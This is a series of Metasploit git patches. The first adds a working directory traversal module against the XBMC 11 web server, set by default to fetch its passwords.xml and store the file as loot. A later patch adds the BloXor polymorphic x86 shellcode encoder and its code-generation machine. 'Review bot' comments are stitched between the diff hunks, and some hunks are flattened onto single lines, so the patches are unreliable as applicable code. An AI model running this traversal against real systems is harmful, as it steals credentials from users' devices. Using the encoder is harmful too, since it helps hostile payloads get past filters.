From dac331fa10d30d709cb1cd4201db35fe42b86118 Mon Sep 17 00:00:00 2001
From: Matt Andreko
Date: Sat, 3 Nov 2012 22:19:48 -0400
Subject: [PATCH 001/139] Added XBMC Traversal exploit
---
 .../auxiliary/scanner/http/xbmc_traversal.rb | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/xbmc_traversal.rb
diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb
new file mode 100644
index 0000000000..11f48abaac
--- /dev/null
+++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb
@@ -0,0 +1,86 @@
+##
+ # This file is part of the Metasploit Framework and may be subject to
+ # redistribution and commercial restrictions. Please see the Metasploit
+ # web site for more information on licensing and terms of use.
+ # http://metasploit.com/
+ ##
+
+ require 'msf/core'
+
+ class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "XBMC Web Server Directory Traversal",
+ 'Description' => %q{
+ This module exploits a directory traversal bug in XBMC 11.
+ The module can only be used to retrieve files.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
+ 'Lucas "acidgen" Lundgren IOActive',
+ 'Matt "hostess" Andreko',
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348']
+ ],
+ 'DisclosureDate' => "Nov 1 2012"
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']),
+ OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']),
+ OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']),
+ ], self.class)
+
+ deregister_options('RHOST')
+ end
+
+ def run_host(ip)
+ # No point to continue if no filename is specified
+ if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+ print_error("Please supply the name of the file you want to download")
+ return
+ end
+
+ # Create request
+ traversal = "../../../../../../../../.."
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
+ 'basic_auth' => "#{datastore['USER']}:#{datastore['PASS']}"
+ }, 25)
+
+ # Show data if needed
+ if res
+ if res.code == 200
+ vprint_line(res.to_s)
+ fname = File.basename(datastore['FILEPATH'])
+
+ path = store_loot(
+ 'xbmc.http',
+ 'application/octet-stream',
+ ip,
+ res.body,
+ fname
+ )
+ print_good("File saved in: #{path}")
+ elsif res.code == 401
+ print_error("#{rhost}:#{rport} Authentication failed")
+ elsif res.code == 404
+ print_error("#{rhost}:#{rport} File not found")
+ end
+ else
+ print_error("HTTP Response failed")
+ end
+ end
+end
From 6843aa3a6c1b34d9674576ae554b475decbb54b3 Mon Sep 17 00:00:00 2001
From: Matt Andreko
Date: Thu, 8 Nov 2012 10:09:28 -0500
Subject: [PATCH 002/139] Added fix URL and a few more comments. Corrected date.
---
 modules/auxiliary/scanner/http/xbmc_traversal.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb
index 11f48abaac..2828421109 100644
--- a/modules/auxiliary/scanner/http/xbmc_traversal.rb
+++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb
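Review bot: In `run_host` any 200 response is reported as a successful download, so an empty body or an HTML error page served with status 200 is written to loot and announced with `print_good`; guard before the `fname = ...` line with `return print_error("#{rhost}:#{rport} Empty response body") if res.body.to_s.empty?`. The `if/elsif` chain on `res.code` also lets every status other than 200, 401 and 404 (403, 500, a redirect) fall through silently, which leaves the operator with no output for that host — add `else print_error("#{rhost}:#{rport} Unexpected HTTP response code #{res.code}")` before the inner `end`. `FILEPATH` is spliced into the request line as-is, so a path containing spaces or `#` will produce a malformed request rather than an error; at minimum the option description should say the value is sent unencoded.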
@@ -17,21 +17,22 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => "XBMC Web Server Directory Traversal", 'Description' => %q{ - This module exploits a directory traversal bug in XBMC 11. + This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. The module can only be used to retrieve files. }, 'License' => MSF_LICENSE, 'Author' => [ - 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton + 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton 'Lucas "acidgen" Lundgren IOActive', 'Matt "hostess" Andreko', ], 'References' => [ - ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'] + ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'], + ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'], ], - 'DisclosureDate' => "Nov 1 2012" + 'DisclosureDate' => "Nov 4 2012" )) register_options( @@ -53,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary end # Create request - traversal = "../../../../../../../../.." + traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", @@ -75,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") elsif res.code == 401 - print_error("#{rhost}:#{rport} Authentication failed") + print_error("#{rhost}:#{rport} Authentication failed") elsif res.code == 404 print_error("#{rhost}:#{rport} File not found") end From 8e6e1bc16408ac51db418c8976bf8defed40d420 Mon Sep 17 00:00:00 2001 
From: Stephen Fewer Date: Thu, 10 Jan 2013 17:39:40 +0000 Subject: [PATCH 003/139] open up the bloxor encoder. --- lib/rex/arch/x86.rb | 19 +- lib/rex/encoder/bloxor/bloxor.rb | 326 ++++++++++++ lib/rex/poly.rb | 1 + lib/rex/poly/machine.rb | 12 + lib/rex/poly/machine/machine.rb | 829 +++++++++++++++++++++++++++++++ lib/rex/poly/machine/x86.rb | 508 +++++++++++++++++++ modules/encoders/x86/bloxor.rb | 58 +++ test/tests/test_encoders.rb | 119 +++++ 8 files changed, 1868 insertions(+), 4 deletions(-) create mode 100644 lib/rex/encoder/bloxor/bloxor.rb create mode 100644 lib/rex/poly/machine.rb create mode 100644 lib/rex/poly/machine/machine.rb create mode 100644 lib/rex/poly/machine/x86.rb create mode 100644 modules/encoders/x86/bloxor.rb create mode 100644 test/tests/test_encoders.rb diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb index 16671ca21f..64b7d52302 100644 --- a/lib/rex/arch/x86.rb +++ b/lib/rex/arch/x86.rb @@ -22,16 +22,27 @@ module X86 ESI = DH = SI = 6 EDI = BH = DI = 7 - REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', - 'esp', 'ebp', 'esi', 'edi' ] # :nodoc: - + REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi' ] + + REG_NAMES16 = [ 'ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di' ] + + REG_NAMES8L = [ 'al', 'cl', 'dl', 'bl', nil, nil, nil, nil ] + # Jump tp a specific register def self.jmp_reg(str) reg = reg_number(str) _check_reg(reg) "\xFF" + [224 + reg].pack('C') end - + + # + # Generate a LOOP instruction (Decrement ECX and jump short if ECX == 0) + # + def self.loop(offset) + "\xE2" + pack_lsb(rel_number(offset, -2)) + end + + # # This method returns the opcodes that compose a jump instruction to the # supplied relative offset. def self.jmp(addr) diff --git a/lib/rex/encoder/bloxor/bloxor.rb b/lib/rex/encoder/bloxor/bloxor.rb new file mode 100644 index 0000000000..b7684a32d1 --- /dev/null +++ b/lib/rex/encoder/bloxor/bloxor.rb 
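Review bot: The comment on the new `loop` helper in lib/rex/arch/x86.rb inverts the instruction's semantics: x86 LOOP decrements ECX and takes the short jump when ECX is *not* zero, so the line should read `# Generate a LOOP instruction (Decrement ECX and jump short if ECX != 0)`. The rel8 displacement is built with `pack_lsb(rel_number(offset, -2))`; if `pack_lsb` keeps only the low byte, as its name suggests, an offset outside -128..127 is silently encoded as a jump to the wrong target rather than rejected, so a range check (or a note that callers must keep the loop body short) belongs here. `REG_NAMES8L` leaves indices 4-7 as nil, which is consistent with the "low byte" name, but a one-line comment such as `# 8-bit low-half names only; ah/ch/dh/bh (4..7) are deliberately excluded` would save the next reader a trip to the encoding table.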
@@ -0,0 +1,326 @@ + +require 'rex/poly/machine' + +module Rex + +module Encoder + + class BloXor < Msf::Encoder + + def initialize( *args ) + super + @machine = nil + @blocks_out = [] + @block_size = 0 + end + + # + # + # + def decoder_stub( state ) + + if( not state.decoder_stub ) + @blocks_out = [] + @block_size = 0 + + # XXX: It would be ideal to use a random block size but unless we know the maximum size our final encoded + # blob can be we should instead start with the smallest block size and go up to avoid generating + # anything too big (if we knew the max size we could try something smaller if we generated a blob too big) + #block_sizes = (1..state.buf.length).to_a.shuffle + #block_sizes.each do | len | + + 1.upto( state.buf.length ) do | len | + + # For now we ignore all odd sizes to help with performance (The rex poly machine + # doesnt have many load/store primitives that can handle byte sizes efficiently) + if( len % 2 != 0 ) + next + end + + blocks, size = compute_encoded( state, len ) + if( blocks and size ) + + # We sanity check that the newly generated block ammount and the block size + # are not in the badchar list when converted into a hex form. Helps speed + # things up a great deal when generating a decoder stub later as these + # values may be used throughout. + + if( not number_is_valid?( state, blocks.length - 1 ) or not number_is_valid?( state, ~( blocks.length - 1 ) ) ) + next + end + + if( not number_is_valid?( state, size ) or not number_is_valid?( state, ~size ) ) + next + end + + @blocks_out = blocks + @block_size = size + + break + end + end + + raise RuntimeError, "Unable to generate seed block." if( @blocks_out.empty? ) + + state.decoder_stub = compute_decoder( state ) + end + + state.decoder_stub + end + + # + # + # + def encode_block( state, data ) + + buffer = '' + + @blocks_out.each do | block | + buffer << block.pack( 'C*' ) + end + + buffer + end + + protected + + # + # Is a number in its byte form valid against the badchars? 
+ # + def number_is_valid?( state, number ) + size = 'C' + if( number > 0xFFFF ) + size = 'V' + elsif( number > 0xFF ) + size = 'v' + end + return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil? + end + + # + # Calculate Shannon's entropy. + # + def entropy( data ) + entropy = 0.to_f + (0..255).each do | byte | + freq = data.to_s.count( byte.chr ).to_f / data.to_s.length + if( freq > 0 ) + entropy -= freq * Math.log2( freq ) + end + end + return entropy / 8 + end + + # + # Compute the encoded blocks (and associated seed) + # + def compute_encoded( state, len ) + + blocks_in = ::Array.new + + input = '' << state.buf + + block_padding = ( input.length % len ) > 0 ? len - ( input.length % len ) : 0 + + if( block_padding > 0 ) + 0.upto( block_padding-1 ) do + input << [ rand( 255 ) ].pack( 'C' ) + end + end + + while( input.length > 0 ) + blocks_in << input[0..len-1].unpack( 'C*' ) + input = input[len..input.length] + end + + seed = compute_seed( blocks_in, len, block_padding, state.badchars.unpack( 'C*' ) ) + + if( not seed ) + return [ nil, nil ] + end + + blocks_out = [ seed ] + + blocks_in.each do | block | + blocks_out << compute_block( blocks_out.last, block ) + end + + return [ blocks_out, len ] + end + + # + # Generate the decoder stub which is functionally equivalent to the following: + # + # source = &end; + # dest = source + BLOCK_SIZE; + # counter = BLOCK_COUNT * ( BLOCK_SIZE / chunk_size ); + # do + # { + # encoded = *(CHUNK_SIZE *)dest; + # dest += chunk_size; + # decoded = *(CHUNK_SIZE *)source; + # *(CHUNK_SIZE *)source = decoded ^ encoded; + # source += chunk_size; + # } while( --counter ); + # + # end: + # + def compute_decoder( state ) + + @machine.create_variable( 'source' ) + @machine.create_variable( 'dest' ) + @machine.create_variable( 'counter' ) + @machine.create_variable( 'encoded' ) + @machine.create_variable( 'decoded' ) + + chunk_size = Rex::Poly::Machine::BYTE + if( @machine.native_size() == 
Rex::Poly::Machine::QWORD ) + if( @block_size % Rex::Poly::Machine::QWORD == 0 ) + chunk_size = Rex::Poly::Machine::QWORD + elsif( @block_size % Rex::Poly::Machine::DWORD == 0 ) + chunk_size = Rex::Poly::Machine::DWORD + elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + elsif( @machine.native_size() == Rex::Poly::Machine::DWORD ) + if( @block_size % Rex::Poly::Machine::DWORD == 0 ) + chunk_size = Rex::Poly::Machine::DWORD + elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + elsif( @machine.native_size() == Rex::Poly::Machine::WORD ) + if( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + end + + # Block 1 - Set the source variable to the address of the start block + @machine.create_block_primitive( 'block1', 'set', 'source', 'location' ) + + # Block 2 - Set the source variable to the address of the 1st encoded block + @machine.create_block_primitive( 'block2', 'add', 'source', 'end' ) + + # Block 3 - Set the destingation variable to the value of the source variable + @machine.create_block_primitive( 'block3', 'set', 'dest', 'source' ) + + # Block 4 - Set the destingation variable to the address of the 2nd encoded block + @machine.create_block_primitive( 'block4', 'add', 'dest', @block_size ) + + # Block 5 - Sets the loop counter to the number of blocks to process + @machine.create_block_primitive( 'block5', 'set', 'counter', ( ( @block_size / chunk_size ) * (@blocks_out.length - 1) ) ) + + # Block 6 - Set the encoded variable to the byte pointed to by the dest variable + @machine.create_block_primitive( 'block6', 'load', 'encoded', 'dest', chunk_size ) + + # Block 7 - Increment the destination variable by one + @machine.create_block_primitive( 'block7', 'add', 'dest', chunk_size ) + + # Block 8 - Set the decoded variable to the byte pointed to by the source variable + @machine.create_block_primitive( 'block8', 'load', 
'decoded', 'source', chunk_size ) + + # Block 9 - Xor the decoded variable with the encoded variable + @machine.create_block_primitive( 'block9', 'xor', 'decoded', 'encoded' ) + + # Block 10 - store the newly decoded byte + @machine.create_block_primitive( 'block10', 'store', 'source', 'decoded', chunk_size ) + + # Block 11 - Increment the source variable by one + @machine.create_block_primitive( 'block11', 'add', 'source', chunk_size ) + + # Block 12 - Jump back up to the outer_loop block while the counter variable > 0 + @machine.create_block_primitive( 'block12', 'loop', 'counter', 'block6' ) + + # Try to generate the decoder stub... + decoder = @machine.generate + + if( not decoder ) + raise RuntimeError, "Unable to generate decoder stub." + end + + decoder + end + + # + # Compute the seed block which will successfully decode all proceeding encoded + # blocks while ensuring the encoded blocks do not contain any badchars. + # + def compute_seed( blocks_in, block_size, block_padding, badchars ) + seed = [] + redo_bytes = [] + + 0.upto( block_size-1 ) do | index | + + seed_bytes = (0..255).sort_by do + rand() + end + + seed_bytes.each do | seed_byte | + + next if( badchars.include?( seed_byte ) ) + + success = true + + previous_byte = seed_byte + + if( redo_bytes.length < 256 ) + redo_bytes = (0..255).sort_by do + rand() + end + end + + blocks_in.each do | block | + + decoded_byte = block[ index ] + + encoded_byte = previous_byte ^ decoded_byte + + if( badchars.include?( encoded_byte ) ) + # the padding bytes we added earlier can be changed if they are causing us to fail. + if( block == blocks_in.last and index >= (block_size-block_padding) ) + if( redo_bytes.empty? 
) + success = false + break + end + block[ index ] = redo_bytes.shift + redo + end + + success = false + break + end + + previous_byte = encoded_byte + end + + if( success ) + seed << seed_byte + break + end + end + + end + + if( seed.length == block_size ) + return seed + end + + return nil + end + + # + # Compute the next encoded block by xoring the previous + # encoded block with the next decoded block. + # + def compute_block( encoded, decoded ) + block = [] + 0.upto( encoded.length-1 ) do | index | + block << ( encoded[ index ] ^ decoded[ index ] ) + end + return block + end + + end + +end + +end \ No newline at end of file diff --git a/lib/rex/poly.rb b/lib/rex/poly.rb index 7e3ebc6db0..428695c168 100644 --- a/lib/rex/poly.rb +++ b/lib/rex/poly.rb @@ -4,6 +4,7 @@ module Poly require 'rex/poly/register' require 'rex/poly/block' +require 'rex/poly/machine' ### # diff --git a/lib/rex/poly/machine.rb b/lib/rex/poly/machine.rb new file mode 100644 index 0000000000..9e60195da1 --- /dev/null +++ b/lib/rex/poly/machine.rb @@ -0,0 +1,12 @@ + +module Rex + + module Poly + + require 'metasm' + require 'rex/poly/machine/machine' + require 'rex/poly/machine/x86' + + end + +end diff --git a/lib/rex/poly/machine/machine.rb b/lib/rex/poly/machine/machine.rb new file mode 100644 index 0000000000..6bac6a8b1f --- /dev/null +++ b/lib/rex/poly/machine/machine.rb 
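Review bot: In `number_is_valid?` the pack width is chosen from the signed value, so the complements that `decoder_stub` passes in (`~( blocks.length - 1 )` and `~size`) are always negative, never exceed 0xFF, and are packed with 'C' — only their low byte is ever compared against the badchars, even when the uncomplemented value needed two or four bytes. This is only a pre-filter (the machine still validates the rendered bytes, per the comment above the check), so the consequence is wasted search time rather than a bad stub, but the check does not do what its comment promises; deriving the width from the magnitude fixes it. Separately, `entropy` is defined but never called anywhere in this file, and `rand( 255 )` in `compute_encoded` yields 0..254, so a padding byte can never be 0xFF, which slightly narrows the seed search for no reason. The file also ends without a trailing newline.
```ruby
def number_is_valid?( state, number )
  # Pick the width from the magnitude so a complemented (negative) value is
  # checked at the same width as the value it was derived from.
  magnitude = number < 0 ? ~number : number
  size = 'C'
  if( magnitude > 0xFFFF )
    size = 'V'
  elsif( magnitude > 0xFF )
    size = 'v'
  end
  return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil?
end
```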
@@ -0,0 +1,829 @@ + +module Rex + + module Poly + + # + # A machine capable of creating a small blob of code in a metamorphic kind of way. + # Note: this is designed to perform an exhaustive search for a solution and can be + # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a + # better choice. + # + class Machine + + QWORD = 8 + DWORD = 4 + WORD = 2 + BYTE = 1 + + # + # A Permutation! + # + class Permutation + + attr_accessor :active, :offset + + attr_reader :name, :primitive, :length, :args + + # + # Create a new permutation object. + # + def initialize( name, primitive, machine, source, args=nil ) + @name = name + @primitive = primitive + @machine = machine + @source = source + @args = args + @active = false + @valid = true + @length = 0 + @offset = 0 + @children = ::Array.new + end + + # + # Add in a child permutation to this one. Used to build the permutation tree. + # + def add_child( child ) + @children << child + end + + # + # Does this permutation have children? + # + def has_children? + not @children.empty? + end + + # + # Remove any existing children. Called by the machines generate function + # to build a fresh tree in case generate was previously called. + # + def remove_children + @children.clear + end + + # + # Actully render this permutation into a raw buffer. + # + def render + raw = '' + # Zero the length as we will be rendering the raw buffer and the length may change. + @length = 0 + # If this permutation source is a Primitive/Procedure we can call it, otherwise we have a string + if( @source.kind_of?( Primitive ) or @source.kind_of?( ::Proc ) ) + if( @source.kind_of?( Primitive ) ) + raw = @source.call( @name, @machine, *@args ) + elsif( @source.kind_of?( ::Proc ) ) + raw = @source.call + end + # If the primitive/procedure returned an array, it is an array of assembly strings which we can assemble. 
+ if( raw.kind_of?( ::Array ) ) + lines = raw + raw = '' + # itterate over each line of assembly + lines.each do | asm | + # parse the asm and substitute in any offset values specified... + offsets = asm.scan( /:([\S]+)_offset/ ) + offsets.each do | name, | + asm = asm.gsub( ":#{name}_offset", @machine.block_offset( name ).to_s ) + end + # and substitute in and register values for any variables specified... + regs = asm.scan( /:([\S]+)_reg([\d]+)/ ) + regs.each do | name, size | + asm = asm.gsub( ":#{name}_reg#{size}", @machine.variable_value( name, size.to_i ) ) + end + # assemble it into a raw blob + blob = @machine.assemble( asm ) + #if( not @machine.is_valid?( blob ) ) + # p "#{name}(#{primitive}):#{asm} is invalid" + #end + raw << blob + end + end + else + # the source must just be a static string + raw = @source + end + # Update the length to reflect the new raw buffer + @length = raw.to_s.length + # As the temp variable is only assigned for the duration of a single permutation we + # can now release it if it was used in this permutation. + @machine.release_temp_variable + return raw.to_s + end + + # + # Test if this permutation raw buffer is valid in this machine (e.g. against the badchar list). + # + def is_valid? + result = false + if( @valid ) + begin + result = @machine.is_valid?( self.render ) + rescue UnallowedPermutation + # This permutation is unallowed and can never be rendered so just mark it as + # not valid to skip it during future attempts. + @valid = false + rescue UndefinedPermutation + # allow an undefined permutation to fail validation but keep it marked + # as valid as it may be defined and passed validation later. + ensure + # Should a temporary variable have been assigned we can release it here. + @machine.release_temp_variable + end + end + return result + end + + # + # Try to find a solution within the solution space by performing a depth first search + # into the permutation tree and backtracking when needed. 
+ # + def solve + # Check to see if this permutation can make part of a valid solution + if( self.is_valid? ) + # record this permutation as part of the final solution (the current machines register state is also saved here) + @machine.solution_push( self ) + # If we have no children we are at the end of the tree and have a potential full solution. + if( not self.has_children? ) + # We have a solution but doing a final pass to update offsets may introduce bad chars + # so we test for this and keep searching if this isnt a real solution after all. + if( not @machine.solution_is_valid? ) + # remove this permutation and keep searching + @machine.solution_pop + return false + end + # Return true to unwind the recursive call as we have got a final solution. + return true + end + # Itterate over the children of this permutation (the perutations of the proceeding block). + @children.each do | child | + # Traverse into this child to keep trying to generate a solution... + if( child.solve ) + # Keep returning true to unwind as we are done. + return true + end + end + # If we get here this permutation, origionally thought to be good for a solution, is not after all, + # so remove it from the machines final solution, restoring the register state aswell. + @machine.solution_pop + end + # No children can be made form part of the solution, return failure for this path in the tree. + return false + end + + end + + # + # A symbolic permutation to mark locations like the begining and end of a group of blocks. + # Used to calculate usefull offsets. + # + class SymbolicPermutation < Permutation + def initialize( name, machine, initial_offset=0 ) + super( name, '', machine, '' ) + # fudge the initial symbolic offset with a default (it gets patched correctly later), + # helps with the end symbolic block to not be 0 (as its a forward reference it really + # slows things down if we leave it 0) + @offset = initial_offset + # A symbolic block is allways active! 
+ @active = true + end + + # + # We block all attempts to set the active state of this permutation so as + # it is always true. This lets us always address the offset. + # + def active=( value ) + end + end + + # + # A primitive is a machine defined permutation which accepts some arguments when it is called. + # + class Primitive + + # + # Initialize this primitive with its target source procedure and the machine it belongs to. + # + def initialize( source ) + @source = source + end + + # + # Call the primitives source procedure, passing in the arguments. + # + def call( name, machine, *args ) + return @source.call( name, machine, *args ) + end + + end + + # + # + # + class Block + + #attr_accessor :next, :previous + attr_reader :name + + def initialize( name ) + @name = name + @next = nil + @previous = nil + @permutations = ::Array.new + end + + def shuffle + @permutations = @permutations.shuffle + end + + def solve + @permutations.first.solve + end + + def << ( permutation ) + @permutations << permutation + end + + def each + @permutations.each do | permutation | + yield permutation + end + end + + end + + # + # A class to hold a solution for a Rex::Poly::Machine problem. + # + class Solution + + attr_reader :offset + + def initialize + @permutations = ::Array.new + @reg_state = ::Array.new + @offset = 0 + end + + # + # Reset this solution to an empty state. 
+ # + def reset + @offset = 0 + @permutations.each do | permutation | + permutation.active = false + permutation.offset = 0 + end + @permutations.clear + @reg_state.clear + end + + # + # Push a new permutation onto this solutions permutations list and save the associated register/variables state + # + def push( permutation, reg_available, reg_consumed, variables ) + permutation.active = true + permutation.offset = @offset + @offset += permutation.length + @permutations.push( permutation ) + @reg_state.push( [ [].concat(reg_available), [].concat(reg_consumed), {}.merge(variables) ] ) + end + + # + # Pop off the last permutaion and register/variables state from this solution. + # + def pop + reg_available, reg_consumed, variables = @reg_state.pop + permutation = @permutations.pop + permutation.active = false + permutation.offset = 0 + @offset -= permutation.length + return permutation, reg_available, reg_consumed, variables + end + + # + # Render the final buffer. + # + def buffer + previous_offset = nil + count = 0 + # perform an N-pass fixup for offsets... + while( true ) do + # If we cant get the offsets fixed within a fixed ammount of tries we return + # nil to indicate failure and keep searching for a solution that will work. + if( count > 64 ) + return nil + end + # Reset the solution offset so as to update it for this pass + @offset = 0 + # perform a single pass to ensure we are using the correct offset values + @permutations.each do | permutation | + permutation.offset = @offset + # Note: calling render() can throw both UndefinedPermutation and UnallowedPermutation exceptions, + # however as we assume we only ever return the buffer once a final solution has been generated + # we should never have either of those exceptions thrown. + permutation.render + @offset += permutation.length + end + # If we have generated two consecutive passes which are the same length we can stop fixing up the offsets. + if( not previous_offset.nil? 
and @offset == previous_offset ) + break + end + count +=1 + previous_offset = @offset + end + # now a final pass to render the solution into the raw buffer + raw = '' + @permutations.each do | permutation | + #$stderr.puts "#{permutation.name} - #{ "0x%08X (%d)" % [ permutation.offset, permutation.length] } " + raw << permutation.render + end + return raw + end + + end + + # + # Create a new machine instance. + # + def initialize( badchars, cpu ) + @badchars = badchars + @cpu = cpu + + @reg_available = ::Array.new + @reg_consumed = ::Array.new + @variables = ::Hash.new + @blocks = ::Hash.new + @primitives = ::Hash.new + @solution = Solution.new + + _create_primitives + + @blocks['begin'] = Block.new( 'begin' ) + @blocks['begin'] << SymbolicPermutation.new( 'begin', self ) + + _create_variable( 'temp' ) + end + + # + # Overloaded by a subclass to return the maximum native general register size supported. + # + def native_size + nil + end + + # + # Use METASM to assemble a line of asm using this machines current cpu. + # + def assemble( asm ) + return Metasm::Shellcode.assemble( @cpu, asm ).encode_string + end + + # + # Check if a data blob is valid against the badchar list (or perform any other validation here) + # + def is_valid?( data ) + if( data.nil? ) + return false + end + return Rex::Text.badchar_index( data, @badchars ).nil? + end + + # + # Generate a 64 bit number whoes bytes are valid in this machine. + # + def make_safe_qword( number=nil ) + return _make_safe_number( QWORD, number ) & 0xFFFFFFFFFFFFFFFF + end + + # + # Generate a 32 bit number whoes bytes are valid in this machine. + # + def make_safe_dword( number=nil ) + return _make_safe_number( DWORD, number ) & 0xFFFFFFFF + end + + # + # Generate a 16 bit number whoes bytes are valid in this machine. + # + def make_safe_word( number=nil ) + return _make_safe_number( WORD, number ) & 0xFFFF + end + + # + # Generate a 8 bit number whoes bytes are valid in this machine. 
+ # + def make_safe_byte( number=nil ) + return _make_safe_number( BYTE, number ) & 0xFF + end + + # + # Create a variable by name which will be assigned a register during generation. We can + # optionally assign a static register value to a variable if needed. + # + def create_variable( name, reg=nil ) + # Sanity check we aren't trying to create one of the reserved variables. + if( name == 'temp' ) + raise RuntimeError, "Unable to create variable, '#{name}' is a reserved variable name." + end + return _create_variable( name, reg ) + end + + # + # If the temp variable was assigned we release it. + # + def release_temp_variable + if( @variables['temp'] ) + regnum = @variables['temp'] + # Sanity check the temp variable was actually assigned (it may not have been if the last permutation didnot use it) + if( regnum ) + # place the assigned register back in the available list for consumption later. + @reg_available.push( @reg_consumed.delete( regnum ) ) + # unasign the temp vars register + @variables['temp'] = nil + return true + end + end + return false + end + + # + # Resolve a variable name into its currently assigned register value. + # + def variable_value( name, size=nil ) + # Sanity check we this variable has been created + if( not @variables.has_key?( name ) ) + raise RuntimeError, "Unknown register '#{name}'." + end + # Pull out its current register value if it has been assigned one + regnum = @variables[ name ] + if( not regnum ) + regnum = @reg_available.pop + if( not regnum ) + raise RuntimeError, "Unable to assign variable '#{name}' a register value, none available." + end + # and add it to the consumed list so we can track it later + @reg_consumed << regnum + # and now assign the variable the register + @variables[ name ] = regnum + end + # resolve the register number int a string representation (e.g. 
0 in x86 is EAX if size is 32) + return _register_value( regnum, size ) + end + + # + # Check this solution is still currently valid (as offsets change it may not be). + # + def solution_is_valid? + return self.is_valid?( @solution.buffer ) + end + + # + # As the solution advances we save state for each permutation step in the solution. This lets + # use rewind at a later stage if the solving algorithm wishes to perform some backtracking. + # + def solution_push( permutation ) + @solution.push( permutation, @reg_available, @reg_consumed, @variables ) + end + + # + # Backtrack one step in the solution and restore the register/variable state. + # + def solution_pop + permutation, @reg_available, @reg_consumed, @variables = @solution.pop + + @reg_available.push( @reg_available.shift ) + end + + # + # Create a block by name and add in its list of permutations. + # + # XXX: this doesnt support the fuzzy order of block dependencies ala the origional rex::poly + def create_block( name, *permutation_sources ) + # Sanity check we aren't trying to create one of the reserved symbolic blocks. + if( name == 'begin' or name == 'end' ) + raise RuntimeError, "Unable to add block, '#{name}' is a reserved block name." + end + # If this is the first time this block is being created, create the block object to hold the permutation list + if( not @blocks[name] ) + @blocks[name] = Block.new( name ) + end + # Now create a new permutation object for every one supplied. + permutation_sources.each do | source | + @blocks[name] << Permutation.new( name, '', self, source ) + end + return name + end + + # + # Create a block which is based on a primitive defined by this machine. + # + def create_block_primitive( block_name, primitive_name, *args ) + # Santiy check this primitive is actually available and is not an internal primitive (begins with an _). 
+ if( not @primitives[primitive_name] or primitive_name[0] == "_" ) + raise RuntimeError, "Unable to add block, Primitive '#{primitive_name}' is not available." + end + # Sanity check we aren't trying to create one of the reserved symbolic blocks. + if( block_name == 'begin' or block_name == 'end' ) + raise RuntimeError, "Unable to add block, '#{block_name}' is a reserved block name." + end + return _create_block_primitive( block_name, primitive_name, *args ) + end + + # + # Get the offset for a blocks active permutation. This is easy for backward references as + # they will already have been rendered and their sizes known. For forward references we + # can't know in advance but the correct value can be known later once the final solution is + # available and a final pass to generate the raw buffer is made. + # + def block_offset( name ) + if( name == 'end' ) + return @solution.offset + elsif( @blocks[name] ) + @blocks[name].each do | permutation | + if( permutation.active ) + return permutation.offset + end + end + end + # If we are forward referencing a block it will be at least the current solutions offset +1 + return @solution.offset + 1 + end + + # + # Does a given block exist? + # + def block_exist?( name ) + return @blocks.include?( name ) + end + + # + # Does a given block exist? + # + def variable_exist?( name ) + return @variables.include?( name ) + end + + # XXX: ambiguity between variable names and block name may introduce confusion!!! make them be unique. + + # + # Resolve a given value into either a number literal, a block offset or + # a variables assigned register. + # + def resolve_value( value, size=nil ) + if( block_exist?( value ) ) + return block_offset( value ) + elsif( variable_exist?( value ) ) + return variable_value( value, size ) + end + return value.to_i + end + + # + # Get the block previous to the target block. 
